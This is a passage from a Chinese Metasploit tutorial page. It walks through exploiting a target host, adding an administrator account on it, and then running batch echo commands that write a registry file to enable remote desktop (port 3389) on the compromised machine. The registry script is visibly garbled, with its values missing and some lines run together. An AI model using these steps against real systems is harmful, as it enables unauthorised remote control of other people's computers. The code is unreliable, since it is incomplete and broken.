当前位置:首页 > metasploit
图 6 填写options
图 7 填写options
图 8 执行exploit
图 9 溢出过程
图 10 查看目标主机信息
图 11 目标主机IP信息
图 12 在目标主机上添加管理员用户
图 13 成功添加用户
注:所有图中显示的乱码是因为msf console不支持中文编码显示。不是执行错误。
2、开启目标主机的终端服务远程登录管理。 已经获得目标主机的command shell,接下来就要开启目标主机的3389终端服务远程控制目标主机。在这里我使用修改注册表的方法,启动终端服务。 以下是代码1内容:
echo Windows Registry Editor Version 5.00 >>3389.reg
echo[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\netcache] >>3389.reg
echo \
echo[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WindowsNT\\CurrentVersion\\Winlogon] >>3389.reg
echo \
echo [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer] >>3389.reg echo \
echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server] >>3389.reg echo \
echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermDD] >>3389.reg echo \
echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermService] >>3389.reg echo \
echo [HKEY_USERS\\.DEFAULT\\Keyboard Layout\\Toggle] >>3389.reg echo \
echo[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]>>3389.reg
echo \
echo[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\WinStations\\RDP-Tcp] >>3389.reg
echo \开启终端服务的注册表文件。
共分享92篇相关文档